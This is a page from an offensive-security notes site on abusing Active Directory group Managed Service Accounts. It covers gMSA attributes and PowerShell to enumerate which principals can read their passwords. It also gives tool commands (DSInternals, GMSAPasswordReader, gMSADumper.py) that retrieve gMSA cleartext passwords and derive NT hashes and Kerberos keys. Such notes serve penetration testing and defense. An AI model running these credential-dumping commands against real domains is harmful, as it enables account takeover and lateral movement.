InfoSec Notes
  • InfoSec Notes
  • General
    • External recon
    • Ports scan
    • Bind / reverse shells
    • File transfer / exfiltration
    • Pivoting
    • Passwords cracking
  • Active Directory
    • Recon - Domain Recon
    • Recon - AD scanners
    • Exploitation - NTLM capture and relay
    • Exploitation - Password spraying
    • Exploitation - Domain Controllers CVE
    • Exploitation - Kerberos AS_REP roasting
    • Exploitation - Credentials theft shuffling
    • Exploitation - GPP and shares searching
    • Exploitation - Kerberos Kerberoasting
    • Exploitation - ACL exploiting
    • Exploitation - GPO users rights
    • Exploitation - Active Directory Certificate Services
    • Exploitation - Kerberos tickets usage
    • Exploitation - Kerberos silver tickets
    • Exploitation - Kerberos delegations
    • Exploitation - gMS accounts (gMSAs)
    • Exploitation - Azure AD Connect
    • Exploitation - Operators to Domain Admins
    • Post Exploitation - ntds.dit dumping
    • Post Exploitation - Kerberos golden tickets
    • Post Exploitation - Trusts hopping
    • Post Exploitation - Persistence
  • L7
    • Methodology
    • 21 - FTP
    • 22 - SSH
    • 25 - SMTP
    • 53 - DNS
    • 111 / 2049 - NFS
    • 113 - Ident
    • 135 - MSRPC
    • 137-139 - NetBIOS
    • 161 - SNMP
    • 389 / 3268 - LDAP
    • 445 - SMB
    • 512 / 513 - REXEC / RLOGIN
    • 554 - RTSP
    • 1099 - JavaRMI
    • 1433 - MSSQL
    • 1521 - ORACLE_DB
    • 3128 - Proxy
    • 3306 - MySQL
    • 3389 - RDP
    • 5985 / 5986 - WSMan
    • 8000 - JDWP
    • 9100 - Printers
    • 11211 - memcached
    • 27017 / 27018 - MongoDB
  • Windows
    • Shellcode and PE loader
    • Bypass PowerShell ConstrainedLanguageMode
    • Bypass AppLocker
    • Local privilege escalation
    • Post exploitation
      • Credentials dumping
      • Defense evasion
      • Local persistence
    • Lateral movements
      • Local credentials re-use
      • Over SMB
      • Over WinRM
      • Over WMI
      • Over DCOM
      • CrackMapExec
  • Linux
    • Local privilege escalation
    • Post exploitation
  • DFIR
    • Common
      • Image acquisition and mounting
      • Memory forensics
      • Web logs analysis
      • Browsers forensics
      • Email forensics
      • Docker forensics
    • Windows
      • Artefacts overview
        • Amcache
        • EVTX
        • Jumplist
        • LNKFile
        • MFT
        • Outlook_files
        • Prefetch
        • RecentFilecache
        • RecycleBin
        • Shellbags
        • Shimcache
        • SRUM
        • Timestamps
        • User Access Logging (UAL)
        • UsnJrnl
        • Miscellaneous
      • TTPs analysis
        • Accounts usage
        • Local persistence
        • Lateral movement
        • PowerShell activity
        • Program execution
        • Timestomping
        • EVTX integrity
        • System uptime
        • ActiveDirectory replication metadata
        • ActiveDirectory persistence
    • Linux
      • Artefacts overview
      • TTPs analysis
        • Timestomping
    • Cloud
      • Azure
      • AWS
    • Tools
      • Velociraptor
      • KAPE
      • Dissect
      • plaso
      • Splunk usage
  • Red Team specifics
    • Phishing - Office Documents
    • OpSec Operating Systems environment
    • EDR bypass with EDRSandBlast
    • Cobalt Strike
  • Web applications
    • Recon - Server exposure
    • Recon - Hostnames discovery
    • Recon - Application mapping
    • Recon - Attack surface overview
    • CMS & softwares
      • ColdFusion
      • DotNetNuke
      • Jenkins
      • Jira
      • Ovidentia
      • WordPress
      • WebDAV
    • Exploitation - Overview
    • Exploitation - Authentication
    • Exploitation - LDAP injections
    • Exploitation - Local and remote file inclusions
    • Exploitation - File upload
    • Exploitation - SQL injections
      • SQLMAP.md
      • MSSQL.md
      • MySQL.md
      • SQLite.md
    • Exploitation - NoSQL injections
      • NoSQLMap.md
      • mongoDB.md
    • Exploitation - GraphQL
  • Binary exploitation
    • Linux - ELF64 ROP leaks
    • (Very) Basic reverse
  • Android
    • Basic static analysis
  • Miscellaneous
    • Regex 101
    • WinDbg Kernel
    • Basic coverage guided fuzzing
Powered by GitBook
On this page
  • Active Directory - group Managed Service Accounts (gMSAs)
  • References
  1. Active Directory

Exploitation - gMS accounts (gMSAs)

PreviousExploitation - Kerberos delegationsNextExploitation - Azure AD Connect

Last updated 3 years ago

Active Directory - group Managed Service Accounts (gMSAs)

Overview

Introduced in Windows Server 2012, group Managed Service Accounts (gMSAs) are service accounts managed by the Active Directory domain services. gMSAs address a shortcoming of standalone Managed Service Accounts (MSA), that were introduced in Windows Server 2008, and were only usable on a single computer. gMSAs use 240-byte passwords, generated and periodically rotated - 30 days by default - by (writable) Domain Controllers using the domain Key Distribution Services (KDS) root key.

gMSAs created using the New-ADServiceAccount PowerShell cmdlet are by default placed in the default managed service accounts container (CN=Managed Service Accounts,<DOMAIN_ROOT>).

gMSAs are objects of class ms-DS-Group-Managed-Service-Account (subclass of Computer) with the following additional attributes:

  • msDS-GroupMSAMembership (PrincipalsAllowedToRetrieveManagedPassword): defines which security principal(s) can retrieve the gMSA password (in the msds-ManagedPassword attribute). It corresponds to a security descriptor, with principal(s) having the right to retrieve the gMSA password being granted the RIGHT_DS_READ_PROPERTY access control right.

  • msds-ManagedPassword: a that contains the gMSA's previous and current clear-text password, as well the expiration timers of the current password. The msds-ManagedPassword attribute is a constructed attribute, calculated by a (writable) Domain Controller upon each query using the Key Distribution Services (KDS) root key and the key identifiers.

  • msDS-ManagedPasswordId and ms-DS-ManagedPasswordPreviousId: contain the key identifier used to compute, respectively, the current and previous password of the gMSA.

  • ms-DS-ManagedPasswordInterval: contains the interval period in days under which the gMSA's password will be rotated. By default, the rotation period is 30 days.

gMSAs enumeration

The PowerShell ActiveDirectory module can be used to enumerate the gMSAs:

# Enumerates the gMSA in the domain.
Get-ADServiceAccount -Filter *
Get-ADObject -LDAPFilter "(objectClass=msDS-GroupManagedServiceAccount)" -Properties *

# Retrieves the principals allowed to retrieve gMSAs' password.
Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword

# Retrieves the principals allowed to retrieve gMSAs' password and highlights potentially dangerous rights (simple analysis based on direct principal names matching).
$PrivilegedPrincipalsRegex = [string]::Join('|', @('CN=Domain Admins', 'CN=Enterprise Admins', 'CN=Domain Controllers'))
$UnprivilegedPrincipalsRegex = [string]::Join('|', @('CN=Domain Users', 'Everyone', 'CN=Domain Computers', 'Authenticated Users', 'Anonymous'))

Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword | ForEach-Object {
    Write-Host -ForegroundColor DarkGreen -BackgroundColor White $_.SamAccountName
    Write-Host $_.DistinguishedName
    Write-Host $_.SID
    Write-Host "`n"

    Write-Host "PrincipalsAllowedToRetrieveManagedPassword:"
    foreach ($Principal in $_.PrincipalsAllowedToRetrieveManagedPassword) {
        If ($Principal -match $UnprivilegedPrincipalsRegex) {
            Write-Host -ForegroundColor Green $Principal
        }
        ElseIf ($Principal -match $PrivilegedPrincipalsRegex) {
            Write-Host -ForegroundColor Red $Principal
        }
        Else { Write-Host -ForegroundColor Yellow $Principal }
    }

    Write-Host "`n"
}

gMSAs ACL enumeration and msDS-GroupMSAMembership modification

Refer to the [ActiveDirectory] ACL exploiting note (group Managed Service Accounts (gMSA) section) for more information on techniques and tools to modify gMSAs's msDS-GroupMSAMembership attribute.

gMSAs password retrieval

Multiple tools and utilities can be used to retrieve a gMSA account password, and further derivate its NTLM / NTHash and Kerberos secrets (AES 128 and AES 256 keys):

Tool
URL
Description

https://github.com/MichaelGrafnetter/DSInternals

Combination of PowerShell cmdlets from the ActiveDirectory and DSInternals modules to retrieve all or the specified gMSAs password and compute the corresponding NTLM / NTHash and Kerberos secrets. Uses the current security context and supports alternate credentials (username/password).

https://github.com/rvazarkar/GMSAPasswordReader

C# utility that retrieve the specified gMSA current and past password to calculate the corresponding NTLM / NTHash and Kerberos secrets. Uses the current security context.

https://github.com/micahvandeusen/gMSADumper Compiled standalone Linux / Windows x64 binaries: https://github.com/Qazeer/OffensivePythonPipeline

Python script to retrieve all gMSAs password (that the given user has access to) to compute the corresponding NTLM / NTHash. Supports user authentication with username/password, username/NTHash, or Kerberos tickets (on Linux using a ticket in the credential cache (ccache) format). Does not leverage the current security context.

# PowerShell ActiveDirectory and DSInternals modules.
# Import-Module "<PATH>\DSInternals.psd1"
$gMSA = Get-ADServiceAccount -Identity '<GMSA_NAME>' -Properties 'msDS-ManagedPassword'
$msDSMP_blob = $gMSA.'msDS-ManagedPassword'

# Decodes the MSDS-MANAGEDPASSWORD_BLOB data structure using the DSInternals module.
$CleartextPassword = ConvertFrom-ADManagedPasswordBlob $msDSMP_blob
$CleartextPassword

# Converts the cleartext password to the corresponding NTLM / NT hash using the DSInternals module.
# To compute the corresponding Kerberos secrets using the cleartext password, refer to the "[ActiveDirectory] Kerberos tickets usage" note.
ConvertTo-NTHash -Password $CleartextPassword.SecureCurrentPassword

# GMSAPasswordReader C# utility.
GMSAPasswordReader.exe --AccountName <GMSA_NAME>

# gMSADumper.py Python script and standalone compiled binaries.
gMSADumper.py -d <DOMAIN> -u <USERNAME> -p <PASSWORD>

# <LM_HASH | NT_HASH> if only the NT_HASH is known: 'aad3b435b51404eeaad3b435b51404ee:<NT_HASH>'
gMSADumper.py -d <DOMAIN> -u <USERNAME> -p <LM_HASH | NT_HASH>

# On Linux, Kerberos authentication using a Ticket-Granting-Ticket in the ccache format.
gMSADumper.py -k -d <DOMAIN> -u <USERNAME>

References

https://docs.microsoft.com/en-us/powershell/module/activedirectory/new-adserviceaccount

https://www.dsinternals.com/en/retrieving-cleartext-gmsa-passwords-from-active-directory/

https://it-central.fr/wp-content/uploads/2017/05/202938243-Comptes-et-groupes-de-services-VSA-MSA-gMSA-tuto-de-A-a-Z.pdf

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#readgmsapassword

PowerShell ActiveDirectory and modules: ActiveDirectory module: Get-ADServiceAccount DSInternals module: ConvertFrom-ADManagedPasswordBlob ConvertTo-NTHash

MSDS-MANAGEDPASSWORD_BLOB
DSInternals
GMSAPasswordReader
gMSADumper.py